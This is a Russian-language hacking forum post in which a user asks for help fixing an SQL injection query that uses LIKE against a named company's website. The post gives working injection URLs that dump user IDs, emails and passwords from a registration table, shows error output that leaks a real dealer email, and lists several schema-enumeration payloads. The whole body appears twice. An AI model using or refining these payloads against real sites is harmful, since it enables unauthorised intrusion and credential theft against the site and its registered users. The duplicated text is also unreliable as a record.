w0rkX
16.05.2013, 21:24
Всем привет! подскажите кто знает как правильно составить запрос чтоб работал оператор LIKE в запросе
я хочу чтоб запрос вывел мне таблицу в которой есть интересующие меня колонки например email pass и т.д
как получить структуру, колонки и содержимое таблиц я знаю
но вот с LIKE у меня не получается не могу понять почему
чтобы было понятнее я хочу рассмотреть на примере
HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD='
есть инъекция
HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD=1%27)%20or%201%3D(select%20top%201%20%2Bcast(us erid%20as%20nvarchar)%2Bchar(0x7e)%2Bcast(email%20 as%20nvarchar)%2Bchar(0x7e)%2Bcast(userpassword%20 as%20nvarchar)%20from%20Piaggio..tbSSORegistration %20where%20userid%3E1)--
Conversion failed when converting the nvarchar value '1370~industrialcars@dealer.piaggio.~???.......... ............' to data type int.
в базе Piaggio есть таблица tbSSORegistration и есть колонки email и userpassword
пробую через LIKE вывести имя таблицы в которой есть колонка email
HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD=') or 1= (SELECT sysobjects.name as tablename,syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE 'email' )--
выводит
Only one expression can be specified in the select list when the subquery is not introduced with EXISTS.
пробовал указать базу
HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD=') or 1= (SELECT Piaggio..sysobjects.name as tablename,Piaggio..syscolumns.name as columnname FROM Piaggio..sysobjects JOIN Piaggio..syscolumns ON Piaggio..sysobjects.id = Piaggio..syscolumns.id WHERE sysobjects.xtype = 'U' AND Piaggio..syscolumns.name LIKE 'email' )--
пробовал и так
HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD=')%20or%201=(select%20top%201%20table_name%20fr om%20information_schema.tables%20where%20table_nam e%20like%20'%25email%25')--
подскажите плз кто знает как правильно запрос составить с LIKE
я хочу чтоб запрос вывел мне таблицу в которой есть интересующие меня колонки например email pass и т.д
как получить структуру, колонки и содержимое таблиц я знаю
но вот с LIKE у меня не получается не могу понять почему
чтобы было понятнее я хочу рассмотреть на примере
HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD='
есть инъекция
HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD=1%27)%20or%201%3D(select%20top%201%20%2Bcast(us erid%20as%20nvarchar)%2Bchar(0x7e)%2Bcast(email%20 as%20nvarchar)%2Bchar(0x7e)%2Bcast(userpassword%20 as%20nvarchar)%20from%20Piaggio..tbSSORegistration %20where%20userid%3E1)--
Conversion failed when converting the nvarchar value '1370~industrialcars@dealer.piaggio.~???.......... ............' to data type int.
в базе Piaggio есть таблица tbSSORegistration и есть колонки email и userpassword
пробую через LIKE вывести имя таблицы в которой есть колонка email
HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD=') or 1= (SELECT sysobjects.name as tablename,syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE 'email' )--
выводит
Only one expression can be specified in the select list when the subquery is not introduced with EXISTS.
пробовал указать базу
HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD=') or 1= (SELECT Piaggio..sysobjects.name as tablename,Piaggio..syscolumns.name as columnname FROM Piaggio..sysobjects JOIN Piaggio..syscolumns ON Piaggio..sysobjects.id = Piaggio..syscolumns.id WHERE sysobjects.xtype = 'U' AND Piaggio..syscolumns.name LIKE 'email' )--
пробовал и так
HTML:
http://www.piaggio.com/info.asp?BR=GILERA&CD=')%20or%201=(select%20top%201%20table_name%20fr om%20information_schema.tables%20where%20table_nam e%20like%20'%25email%25')--
подскажите плз кто знает как правильно запрос составить с LIKE